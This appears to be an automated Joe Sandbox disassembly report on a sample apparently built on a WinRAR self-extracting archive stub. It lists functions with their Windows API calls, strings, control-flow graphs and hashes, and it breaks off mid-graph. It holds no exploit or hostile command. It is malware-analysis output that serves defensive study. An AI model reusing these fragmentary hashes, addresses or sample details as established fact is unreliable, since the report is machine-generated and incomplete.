                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: FileFind$ErrorFirstLast$Next
                  • String ID:
                  • API String ID: 869497890-0
                  • Opcode ID: 0168267228524d525c934b646927f30ba81a9f3b379e8ab6ee9d0e7f166a358a
                  • Instruction ID: 9eabf85a4ec5a24f74849be6747048813856d2ed2bbf1bae6f4fc45f041e1a9b
                  • Opcode Fuzzy Hash: 0168267228524d525c934b646927f30ba81a9f3b379e8ab6ee9d0e7f166a358a
                  • Instruction Fuzzy Hash: DB418072504645AFC324EF68C884ADFF7F8BF99350F144A2AF5ADD3200D774A9588B92
                  Function 0019753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,?,00197513,00000000,001ABAD8,0000000C,0019766A,00000000,00000002,00000000), ref: 0019755E
                  • TerminateProcess.KERNEL32(00000000,?,00197513,00000000,001ABAD8,0000000C,0019766A,00000000,00000002,00000000), ref: 00197565
                  • ExitProcess.KERNEL32 ref: 00197577
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: 9def08a2b07f36ef7d67eb0d67075a0d6368c97354faba089a1c03da665b1bcb
                  • Instruction ID: 0e598246ed9a054991ed308554b716139883f4e50693c8c064e0c8642f670d31
                  • Opcode Fuzzy Hash: 9def08a2b07f36ef7d67eb0d67075a0d6368c97354faba089a1c03da665b1bcb
                  • Instruction Fuzzy Hash: 47E08C31010908AFDF11AF24DE09B483F29EF12342F018014F8058A672CB35DE83CB80
                  Function 0017857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID:
                  • API String ID: 3004599000-0
                  • Opcode ID: 03aaf436a3ccc8de5d964ed7b0950c8660e56b44d41f11a5803078e10e4bef5a
                  • Instruction ID: 7eeee98e094e3f148b692d9c991b008183710326fcb6ca4a314541cf92e60120
                  • Opcode Fuzzy Hash: 03aaf436a3ccc8de5d964ed7b0950c8660e56b44d41f11a5803078e10e4bef5a
                  • Instruction Fuzzy Hash: 0C820970944245AEDF25DF64C889BFABBB9AF15300F08C1BAED5D9B142DF315A48CB60
                  Function 0018AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 0018AEE5
                    • Part of subcall function 0017130B: GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                    • Part of subcall function 0017130B: SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prologItemTextWindow
                  • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                  • API String ID: 810644672-8108337
                  • Opcode ID: 85a86adaf51d95bd37c6b81e4ee39e02bf09538862d0d8dab05e73abeb0f3ca7
                  • Instruction ID: d9431721c654bf1465f2afebc98b3fe3334091d625b67a2d1f341dbac046f898
                  • Opcode Fuzzy Hash: 85a86adaf51d95bd37c6b81e4ee39e02bf09538862d0d8dab05e73abeb0f3ca7
                  • Instruction Fuzzy Hash: 1D42E270949244BFEB21BBB09CCAFBE7B7CAB26700F444159F605A65D2CB744A84CF61
                  Function 001800CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 257 1800cf-1800ee call 18e360 GetModuleHandleW 260 1800f0-180107 GetProcAddress 257->260 261 180154-1803b2 257->261 264 180109-18011f 260->264 265 180121-180131 GetProcAddress 260->265 262 1803b8-1803c3 call 1970dd 261->262 263 180484-1804b3 GetModuleFileNameW call 17bc85 call 17fe56 261->263 262->263 273 1803c9-1803fa GetModuleFileNameW CreateFileW 262->273 279 1804b5-1804bf call 17acf5 263->279 264->265 265->261 268 180133-180152 265->268 268->261 276 180478-18047f CloseHandle 273->276 277 1803fc-18040a SetFilePointer 273->277 276->263 277->276 280 18040c-180429 ReadFile 277->280 285 1804cc 279->285 286 1804c1-1804c5 call 180085 279->286 280->276 282 18042b-180450 280->282 284 18046d-180476 call 17fbd8 282->284 284->276 294 180452-18046c call 180085 284->294 289 1804ce-1804d0 285->289 291 1804ca 286->291 292 1804f2-180518 call 17bcfb GetFileAttributesW 289->292 293 1804d2-1804f0 CompareStringW 289->293 291->289 296 18051a-18051e 292->296 301 180522 292->301 293->292 293->296 294->284 296->279 299 180520 296->299 302 180526-180528 299->302 301->302 303 18052a 302->303 304 180560-180562 302->304 305 18052c-180552 call 17bcfb GetFileAttributesW 303->305 306 180568-18057f call 17bccf call 17acf5 304->306 307 18066f-180679 304->307 313 18055c 305->313 314 180554-180558 305->314 317 180581-1805e2 call 180085 * 2 call 17ddd1 call 17400a call 17ddd1 call 189f35 306->317 318 1805e7-18061a call 17400a AllocConsole 306->318 313->304 314->305 316 18055a 314->316 316->304 324 180667-180669 ExitProcess 317->324 323 18061c-180661 GetCurrentProcessId AttachConsole call 1935b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->323 318->324 323->324
                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32), ref: 001800E4
                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001800F6
                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00180127
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001803D4
                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001803F0
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00180402
                  • ReadFile.KERNEL32(00000000,?,00007FFE,001A3BA4,00000000), ref: 00180421
                  • CloseHandle.KERNEL32(00000000), ref: 00180479
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0018048F
                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 001804E7
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00180510
                  • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0018054A
                    • Part of subcall function 00180085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001800A0
                    • Part of subcall function 00180085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0017EB86,Crypt32.dll,00000000,0017EC0A,?,?,0017EBEC,?,?,?), ref: 001800C2
                  • _swprintf.LIBCMT ref: 001805BE
                  • _swprintf.LIBCMT ref: 0018060A
                    • Part of subcall function 0017400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0017401D
                  • AllocConsole.KERNEL32 ref: 00180612
                  • GetCurrentProcessId.KERNEL32 ref: 0018061C
                  • AttachConsole.KERNEL32(00000000), ref: 00180623
                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00180649
                  • WriteConsoleW.KERNEL32(00000000), ref: 00180650
                  • Sleep.KERNEL32(00002710), ref: 0018065B
                  • FreeConsole.KERNEL32 ref: 00180661
                  • ExitProcess.KERNEL32 ref: 00180669
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                  • API String ID: 1201351596-3298887752
                  • Opcode ID: 1302043e06549deff965aa9db15d580c6494e316058aabf94f936160a7c6d1c3
                  • Instruction ID: ad83f8c898b1d25103ea400b5de56e1e01055777c20044fecd7fc4355c795ecd
                  • Opcode Fuzzy Hash: 1302043e06549deff965aa9db15d580c6494e316058aabf94f936160a7c6d1c3
                  • Instruction Fuzzy Hash: ECD183B5148384ABD331AF50DE49B9FBBE8BF86704F50491DF6A9A6140D7B087488F63
                  Function 0018BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 406 18bdf5-18be0d call 18e28c call 18e360 411 18ca90-18ca9d 406->411 412 18be13-18be3d call 18aa36 406->412 412->411 415 18be43-18be48 412->415 416 18be49-18be57 415->416 417 18be58-18be6d call 18a6c7 416->417 420 18be6f 417->420 421 18be71-18be86 call 1817ac 420->421 424 18be88-18be8c 421->424 425 18be93-18be96 421->425 424->421 426 18be8e 424->426 427 18ca5c-18ca87 call 18aa36 425->427 428 18be9c 425->428 426->427 427->416 439 18ca8d-18ca8f 427->439 430 18c132-18c134 428->430 431 18bea3-18bea6 428->431 432 18c074-18c076 428->432 433 18c115-18c117 428->433 430->427 436 18c13a-18c141 430->436 431->427 438 18beac-18bf06 call 189da4 call 17b965 call 17a49d call 17a5d7 call 1770bf 431->438 432->427 437 18c07c-18c088 432->437 433->427 434 18c11d-18c12d SetWindowTextW 433->434 434->427 436->427 440 18c147-18c160 436->440 441 18c08a-18c09b call 197168 437->441 442 18c09c-18c0a1 437->442 494 18c045-18c05a call 17a52a 438->494 439->411 444 18c168-18c176 call 1935b3 440->444 445 18c162 440->445 441->442 448 18c0ab-18c0b6 call 18ab9a 442->448 449 18c0a3-18c0a9 442->449 444->427 463 18c17c-18c185 444->463 445->444 450 18c0bb-18c0bd 448->450 449->450 456 18c0c8-18c0e8 call 1935b3 call 1935de 450->456 457 18c0bf-18c0c6 call 1935b3 450->457 483 18c0ea-18c0f1 456->483 484 18c101-18c103 456->484 457->456 467 18c1ae-18c1b1 463->467 468 18c187-18c18b 463->468 471 18c296-18c2a4 call 17fe56 467->471 472 18c1b7-18c1ba 467->472 468->467 469 18c18d-18c195 468->469 469->427 475 18c19b-18c1a9 call 17fe56 469->475 485 18c2a6-18c2ba call 1917cb 471->485 477 18c1bc-18c1c1 472->477 478 18c1c7-18c1e2 472->478 475->485 477->471 477->478 495 18c22c-18c233 478->495 496 18c1e4-18c21e 478->496 490 18c0f8-18c100 call 197168 483->490 491 18c0f3-18c0f5 483->491 484->427 486 18c109-18c110 call 1935ce 484->486 505 18c2bc-18c2c0 485->505 506 18c2c7-18c318 call 17fe56 call 18a8d0 GetDlgItem SetWindowTextW SendMessageW call 1935e9 485->506 486->427 490->484 491->490 512 18bf0b-18bf1f SetFileAttributesW 494->512 513 18c060-18c06f call 17a4b3 494->513 499 18c261-18c284 call 1935b3 * 2 495->499 500 18c235-18c24d call 1935b3 495->500 529 18c220 496->529 530 18c222-18c224 496->530 499->485 534 18c286-18c294 call 17fe2e 499->534 500->499 516 18c24f-18c25c call 17fe2e 500->516 505->506 511 18c2c2-18c2c4 505->511 540 18c31d-18c321 506->540 511->506 517 18bfc5-18bfd5 GetFileAttributesW 512->517 518 18bf25-18bf58 call 17b4f7 call 17b207 call 1935b3 512->518 513->427 516->499 517->494 527 18bfd7-18bfe6 DeleteFileW 517->527 550 18bf5a-18bf69 call 1935b3 518->550 551 18bf6b-18bf79 call 17b925 518->551 527->494 533 18bfe8-18bfeb 527->533 529->530 530->495 537 18bfef-18c01b call 17400a GetFileAttributesW 533->537 534->485 546 18bfed-18bfee 537->546 547 18c01d-18c033 MoveFileW 537->547 540->427 545 18c327-18c33b SendMessageW 540->545 545->427 546->537 547->494 549 18c035-18c03f MoveFileExW 547->549 549->494 550->551 556 18bf7f-18bfbe call 1935b3 call 18f350 550->556 551->513 551->556 556->517
                  APIs
                  • __EH_prolog.LIBCMT ref: 0018BDFA
                    • Part of subcall function 0018AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0018AAFE
                  • SetWindowTextW.USER32(?,?), ref: 0018C127
                  • _wcsrchr.LIBVCRUNTIME ref: 0018C2B1
                  • GetDlgItem.USER32(?,00000066), ref: 0018C2EC
                  • SetWindowTextW.USER32(00000000,?), ref: 0018C2FC
                  • SendMessageW.USER32(00000000,00000143,00000000,001BA472), ref: 0018C30A
                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0018C335
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                  • API String ID: 3564274579-312220925
                  • Opcode ID: 277b0e85d26021e002aa7fda1608b5c4d09e739db72f40a5557b04669d425635
                  • Instruction ID: b3b761c2215595ccbb5b99292424b9011b9aecddb1fd462f0be2f913800b5000
                  • Opcode Fuzzy Hash: 277b0e85d26021e002aa7fda1608b5c4d09e739db72f40a5557b04669d425635
                  • Instruction Fuzzy Hash: 8AE16376D04118AADF25EBA0DC85EEF777CAF19351F104066F519E3091EB749B848FA0
                  Function 0017D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 561 17d341-17d378 call 18e28c call 18e360 call 1915e8 568 17d3ab-17d3b4 call 17fe56 561->568 569 17d37a-17d3a9 GetModuleFileNameW call 17bc85 call 17fe2e 561->569 572 17d3b9-17d3dd call 179619 call 1799b0 568->572 569->572 580 17d3e3-17d3eb 572->580 581 17d7a0-17d7a6 call 179653 572->581 583 17d3ed-17d405 call 183781 * 2 580->583 584 17d409-17d438 call 195a90 * 2 580->584 585 17d7ab-17d7bb 581->585 595 17d407 583->595 594 17d43b-17d43e 584->594 596 17d444-17d44a call 179e40 594->596 597 17d56c-17d58f call 179d30 call 1935d3 594->597 595->584 601 17d44f-17d476 call 179bf0 596->601 597->581 606 17d595-17d5b0 call 179bf0 597->606 607 17d535-17d538 601->607 608 17d47c-17d484 601->608 620 17d5b2-17d5b7 606->620 621 17d5b9-17d5cc call 1935d3 606->621 612 17d53b-17d55d call 179d30 607->612 610 17d486-17d48e 608->610 611 17d4af-17d4ba 608->611 610->611 614 17d490-17d4aa call 195ec0 610->614 615 17d4e5-17d4ed 611->615 616 17d4bc-17d4c8 611->616 612->594 626 17d563-17d566 612->626 637 17d4ac 614->637 638 17d52b-17d533 614->638 618 17d4ef-17d4f7 615->618 619 17d519-17d51d 615->619 616->615 623 17d4ca-17d4cf 616->623 618->619 627 17d4f9-17d513 call 195ec0 618->627 619->607 628 17d51f-17d522 619->628 629 17d5f1-17d5f8 620->629 621->581 642 17d5d2-17d5ee call 18137a call 1935ce 621->642 623->615 625 17d4d1-17d4e3 call 195808 623->625 625->615 643 17d527 625->643 626->581 626->597 627->581 627->619 628->608 633 17d5fc-17d625 call 17fdfb call 1935d3 629->633 634 17d5fa 629->634 651 17d627-17d62e call 1935ce 633->651 652 17d633-17d649 633->652 634->633 637->611 638->612 642->629 643->638 651->581 654 17d731-17d757 call 17ce72 call 1935ce * 2 652->654 655 17d64f-17d65d 652->655 691 17d771-17d79d call 195a90 * 2 654->691 692 17d759-17d76f call 183781 * 2 654->692 658 17d664-17d669 655->658 660 17d66f-17d678 658->660 661 17d97c-17d984 658->661 662 17d684-17d68b 660->662 663 17d67a-17d67e 660->663 664 17d72b-17d72e 661->664 665 17d98a-17d98e 661->665 667 17d691-17d6b6 662->667 668 17d880-17d891 call 17fcbf 662->668 663->661 663->662 664->654 669 17d990-17d996 665->669 670 17d9de-17d9e4 665->670 674 17d6b9-17d6de call 1935b3 call 195808 667->674 693 17d897-17d8c0 call 17fe56 call 195885 668->693 694 17d976-17d979 668->694 675 17d722-17d725 669->675 676 17d99c-17d9a3 669->676 672 17d9e6-17d9ec 670->672 673 17da0a-17da2a call 17ce72 670->673 672->673 679 17d9ee-17d9f4 672->679 696 17da02-17da05 673->696 710 17d6f6 674->710 711 17d6e0-17d6ea 674->711 675->658 675->664 682 17d9a5-17d9a8 676->682 683 17d9ca 676->683 679->675 686 17d9fa-17da01 679->686 689 17d9c6-17d9c8 682->689 690 17d9aa-17d9ad 682->690 695 17d9cc-17d9d9 683->695 686->696 689->695 698 17d9c2-17d9c4 690->698 699 17d9af-17d9b2 690->699 691->581 692->691 693->694 720 17d8c6-17d93c call 181596 call 17fdfb call 17fdd4 call 17fdfb call 1958d9 693->720 694->661 695->675 698->695 705 17d9b4-17d9b8 699->705 706 17d9be-17d9c0 699->706 705->679 712 17d9ba-17d9bc 705->712 706->695 718 17d6f9-17d6fd 710->718 711->710 717 17d6ec-17d6f4 711->717 712->695 717->718 718->674 721 17d6ff-17d706 718->721 754 17d93e-17d947 720->754 755 17d94a-17d95f 720->755 723 17d7be-17d7c1 721->723 724 17d70c-17d71a call 17fdfb 721->724 723->668 726 17d7c7-17d7ce 723->726 731 17d71f 724->731 729 17d7d6-17d7d7 726->729 730 17d7d0-17d7d4 726->730 729->726 730->729 733 17d7d9-17d7e7 730->733 731->675 735 17d7e9-17d7ec 733->735 736 17d808-17d830 call 181596 733->736 738 17d805 735->738 739 17d7ee-17d803 735->739 743 17d853-17d85b 736->743 744 17d832-17d84e call 1935e9 736->744 738->736 739->735 739->738 747 17d862-17d87b call 17dd6b 743->747 748 17d85d 743->748 744->731 747->731 748->747 754->755 756 17d960-17d967 755->756 757 17d973-17d974 756->757 758 17d969-17d96d 756->758 757->756 758->731 758->757
                  APIs
                  • __EH_prolog.LIBCMT ref: 0017D346
                  • _wcschr.LIBVCRUNTIME ref: 0017D367
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0017D328,?), ref: 0017D382
                  • __fprintf_l.LIBCMT ref: 0017D873
                    • Part of subcall function 0018137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0017B652,00000000,?,?,?,00010484), ref: 00181396
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                  • API String ID: 4184910265-980926923
                  • Opcode ID: c8f91907fe2b5892437f4c37700ccd4c6ce45185c85bdbffeac32558ef40943b
                  • Instruction ID: a03dbec31285da7fbe194e4692884a2eb87301ab2262257e288278a8d4776efd
                  • Opcode Fuzzy Hash: c8f91907fe2b5892437f4c37700ccd4c6ce45185c85bdbffeac32558ef40943b
                  • Instruction Fuzzy Hash: AE12B0B190021D9ADF24EFA4EC81BEEB7B5FF14704F108569F61AB7181EB709A45CB24
                  Function 0018CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0018AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0018AC85
                    • Part of subcall function 0018AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0018AC96
                    • Part of subcall function 0018AC74: IsDialogMessageW.USER32(00010484,?), ref: 0018ACAA
                    • Part of subcall function 0018AC74: TranslateMessage.USER32(?), ref: 0018ACB8
                    • Part of subcall function 0018AC74: DispatchMessageW.USER32(?), ref: 0018ACC2
                  • GetDlgItem.USER32(00000068,001CECB0), ref: 0018CB6E
                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0018A632,00000001,?,?,0018AECB,001A4F88,001CECB0), ref: 0018CB96
                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0018CBA1
                  • SendMessageW.USER32(00000000,000000C2,00000000,001A35B4), ref: 0018CBAF
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0018CBC5
                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0018CBDF
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0018CC23
                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0018CC31
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0018CC40
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0018CC67
                  • SendMessageW.USER32(00000000,000000C2,00000000,001A431C), ref: 0018CC76
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                  • String ID: \
                  • API String ID: 3569833718-2967466578
                  • Opcode ID: d604fcdc3eef11050b5ff382434ca6e869f7af4e26f830865a37f9ead7907bd3
                  • Instruction ID: a102c6348cbdc955b3d6a70c8b35d49d4675c429432bd9defa9e613b3500d578
                  • Opcode Fuzzy Hash: d604fcdc3eef11050b5ff382434ca6e869f7af4e26f830865a37f9ead7907bd3
                  • Instruction Fuzzy Hash: 4B310472146741AFE301DF20DC4AFAB7FACEB92704F00050AF66096191DB744A44CBB6
                  Function 0018CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 795 18ce22-18ce3a call 18e360 798 18d08b-18d093 795->798 799 18ce40-18ce4c call 1935b3 795->799 799->798 802 18ce52-18ce7a call 18f350 799->802 805 18ce7c 802->805 806 18ce84-18ce91 802->806 805->806 807 18ce93 806->807 808 18ce95-18ce9e 806->808 807->808 809 18cea0-18cea2 808->809 810 18ced6 808->810 811 18ceaa-18cead 809->811 812 18ceda-18cedd 810->812 813 18d03c-18d041 811->813 814 18ceb3-18cebb 811->814 815 18cedf-18cee2 812->815 816 18cee4-18cee6 812->816 819 18d043 813->819 820 18d036-18d03a 813->820 817 18cec1-18cec7 814->817 818 18d055-18d05d 814->818 815->816 821 18cef9-18cf0e call 17b493 815->821 816->821 822 18cee8-18ceef 816->822 817->818 827 18cecd-18ced4 817->827 823 18d05f-18d061 818->823 824 18d065-18d06d 818->824 828 18d048-18d04c 819->828 820->813 820->828 830 18cf10-18cf1d call 1817ac 821->830 831 18cf27-18cf32 call 17a180 821->831 822->821 825 18cef1 822->825 823->824 824->812 825->821 827->810 827->811 828->818 830->831 836 18cf1f 830->836 837 18cf4f-18cf5c ShellExecuteExW 831->837 838 18cf34-18cf4b call 17b239 831->838 836->831 840 18d08a 837->840 841 18cf62-18cf6f 837->841 838->837 840->798 842 18cf71-18cf78 841->842 843 18cf82-18cf84 841->843 842->843 845 18cf7a-18cf80 842->845 846 18cf9b-18cfba call 18d2e6 843->846 847 18cf86-18cf8f 843->847 845->843 848 18cff1-18cffd CloseHandle 845->848 846->848 865 18cfbc-18cfc4 846->865 847->846 856 18cf91-18cf99 ShowWindow 847->856 849 